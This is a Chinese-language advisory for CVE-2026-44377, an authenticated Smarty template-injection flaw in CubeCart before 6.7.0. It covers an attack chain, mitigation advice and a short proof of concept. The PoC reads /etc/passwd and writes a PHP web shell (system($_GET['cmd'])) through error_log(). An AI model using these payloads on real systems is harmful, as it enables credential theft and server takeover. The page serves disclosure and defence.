CVE-2026-44377 CVSS 9.1 严重

CVE-2026-44377 CubeCart SSTI致远程代码执行漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44377

漏洞类型

服务端模板注入 (SSTI)

CVSS评分

9.1 严重

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

CubeCart

漏洞概述

CubeCart 6.7.0之前的版本中存在严重的经过身份验证的服务器端模板注入（SSTI）漏洞。该漏洞影响电子邮件模板和文档等多个模块。由于应用程序通过Smarty模板引擎不安全地评估用户提供的输入，具有管理员权限的攻击者可利用此漏洞绕过限制，调用原生PHP函数，最终导致敏感信息泄露和完全的远程代码执行（RCE）。

技术细节

该漏洞的核心在于CubeCart在处理用户输入时，直接将其传递给Smarty模板引擎进行解析，而未进行充分的过滤或沙箱限制。攻击者需要具备管理员权限才能访问受影响的模块（如Email Templates）。利用Smarty模板引擎的特性，攻击者可以构造恶意的模板语法，从而在服务器端执行任意PHP代码。具体的利用方式包括使用Smarty标签调用PHP原生函数。例如，攻击者可以使用readgzfile()读取服务器上的配置文件获取数据库凭据，或者利用error_log()将恶意的PHP代码写入服务器上的可写目录，生成Webshell。由于CVSS向量中S:C（Scope Changed），成功的利用可能导致整个服务器的沦陷，造成严重的数据泄露和系统控制权丧失。

攻击链分析

STEP 1

1. 获取凭证

攻击者获取CubeCart管理员账户的高权限凭证。

STEP 2

2. 访问功能点

登录后台，访问受影响的模块（如Email Templates或Documents）。

STEP 3

3. 注入Payload

在模板字段中注入恶意的Smarty模板代码，利用SSTI漏洞调用PHP函数。

STEP 4

4. 执行代码

服务器端Smarty引擎解析恶意模板，执行如readgzfile或error_log等PHP原生函数。

STEP 5

5. 获取控制权

成功读取敏感文件或写入Webshell，实现远程代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

{* Proof of Concept: CubeCart SSTI *}

{* Attempt to read sensitive file *}
{php}readgzfile('/etc/passwd');{/php}

{* Attempt to write a web shell *}
{php}error_log('<?php system($_GET["cmd"]); ?>', 3, './shell.php');{/php}

影响范围

CubeCart < 6.7.0

防御指南

临时缓解措施

建议立即将CubeCart升级至6.7.0或更高版本。如果无法立即升级，应严格限制管理员账户的权限，仅允许可信人员访问，并监控服务器日志中是否存在异常的文件读取或写入行为（如error_log的异常调用）。同时，检查Web目录下是否出现未知的PHP文件。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表